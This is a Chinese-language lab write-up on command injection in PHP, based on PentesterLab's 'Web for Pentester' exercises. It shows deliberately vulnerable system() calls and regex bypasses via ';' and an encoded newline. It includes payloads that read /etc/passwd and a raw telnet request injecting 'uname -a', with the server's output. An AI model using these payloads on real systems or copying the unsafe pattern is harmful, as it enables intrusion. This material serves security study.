常见web漏洞-command execution

资料下载:pentesterLab download

命令执行:

漏洞代码:

1
2
3
<?php
  system("ping -c 2 ".$_GET['ip']);
?>

system()函数,执行系统命令,
ping -c 2 ip,由于ip是客户端可控,导致命令执行。

漏洞代码二:

1
2
3
4
5
6
<?php
  if (!(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}$/m', $_GET['ip']))) {
     die("Invalid IP address");
  }
  system("ping -c 2 ".$_GET['ip']);
?>

在执行命令之前,先正则表达式判断。

127.0.0.1;cat /etc/passwd
不满足正则表达式,所以返回无效的ip地址。

1
2
127.0.0.1
cat /etc/passwd

如果注入上面这样的代码,就会判断127.0.0.1是有效的ip,然后执行system函数


将\n换行符url编码。

漏洞代码三:

1
2
3
4
5
6
<?php
  if (!(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}$/', $_GET['ip']))) {
     header("Location: example3.php?ip=127.0.0.1");
  }
  system("ping -c 2 ".$_GET['ip']);
?>

如果ip参数为正确的地址,则执行system(),否则就执行Location: example3.php?ip=127.0.0.1

  • 效果展示
    如果是有效地址,则ping给出的地址,如果是无效地址,就会ping 127.0.0.1。

  • 漏洞利用
    原理:由于在正则表达式判断ip地址时候,如果不符合,没有中止运行,而是302跳转到“Location: example3.php?ip=127.0.0.1”。
    所以可以用nc或者telnet,观察到命令的执行结果。

1
2
telnet 192.168.2.131 80
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
HTTP/1.1 302 Found
Date: Tue, 13 Nov 2018 08:52:44 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze15
X-XSS-Protection: 0
Location: example3.php?ip=127.0.0.1
Vary: Accept-Encoding
Content-Length: 1535
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>PentesterLab &raquo; Web for Pentester</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Web For Pentester">
    <meta name="author" content="Louis Nyffenegger (louis@pentesterlab.com)">

    <!-- Le styles -->
    <link href="/css/bootstrap.css" rel="stylesheet">

    <style type="text/css">
      body {
        padding-top: 60px;
        padding-bottom: 40px;
      }
    </style>
    <link href="/css/bootstrap-responsive.css" rel="stylesheet">

  </head>

  <body>

    <div class="navbar navbar-inverse navbar-fixed-top">
      <div class="navbar-inner">
        <div class="container">
          <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </a>
          <a class="brand" href="https://pentesterlab.com/">PentesterLab.com</a>
          <div class="nav-collapse collapse">
            <ul class="nav">
              <li class="active"><a href="/">Home</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </div>
    </div>

    <div class="container">
<pre>
Linux debian 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
</pre>
      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

    </div> <!-- /container -->


  </body>
</html>

命令执行的函数

system、exec、passthru、shell_exec、popen、proc_open、pcntl_exec

参考文档:命令执行函数

命令执行漏洞的危害

可以使得攻击者反弹一个shell。
例如LTR Scene(php写入一句话+sudoer提权)

G0rmint(一句话写入log 提权)